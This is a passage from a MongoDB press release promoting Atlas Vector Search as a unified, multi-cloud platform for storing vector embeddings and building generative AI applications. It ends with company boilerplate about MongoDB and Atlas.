However, adding a single-purpose database to their technology stack requires developers to spend valuable time and effort learning the intricacies of developing with and maintaining each point solution. For example, developers must synchronize data across data stores to ensure applications can respond in real time to end-user requests, which is difficult to implement and can significantly increase complexity, cost, and potential security risks.

Many single-purpose databases also lack the flexibility to run as a managed service on any major cloud provider for high performance and resilience, severely limiting long-term infrastructure options. Because of these challenges, organizations from early-stage startups to established enterprises want the ability to store vectors alongside all of their data in a flexible, unified, multi-cloud developer data platform to quickly deploy applications and improve operational efficiency.

MongoDB Atlas Vector Search addresses these challenges by providing the capabilities needed to build generative AI applications on any major cloud provider for high availability and resilience with significantly less time and effort. MongoDB Atlas Vector Search provides the functionality of a vector database integrated as part of a unified developer data platform, allowing teams to store and process vector embeddings alongside virtually any type of data to more quickly and easily build generative AI applications. Dataworkz, Drivly, ExTrac, Inovaare Corporation, NWO.ai, One AI, VISO Trust, and many other organizations are already using MongoDB Atlas Vector Search in preview to build AI-powered applications for reducing public safety risk, improving healthcare compliance, surfacing intelligence from vast amounts of content in multiple languages, streamlining customer service, and improving corporate risk assessment.

About MongoDB Atlas

MongoDB Atlas is the leading multi-cloud developer data platform that accelerates and simplifies building applications with data. MongoDB Atlas provides an integrated set of data and application services in a unified environment that enables development teams to quickly build with the performance and scale modern applications require. Tens of thousands of customers and millions of developers worldwide rely on MongoDB Atlas every day to power their business-critical applications. To get started with MongoDB Atlas, visit mongodb.com/atlas.

About MongoDB

Headquartered in New York, MongoDB’s mission is to empower innovators to create, transform, and disrupt industries by unleashing the power of software and data. Built by developers, for developers, our developer data platform is a database with an integrated set of related services that allow development teams to address the growing requirements for today’s wide variety of modern applications, all in a unified and consistent user experience. MongoDB has tens of thousands of customers in over 100 countries. The MongoDB database platform has been downloaded hundreds of millions of times since 2007, and there have been millions of builders trained through MongoDB University courses. To learn more, visit mongodb.com.


Source: MongoDB

Article originally posted on mongodb google news. Visit mongodb google news
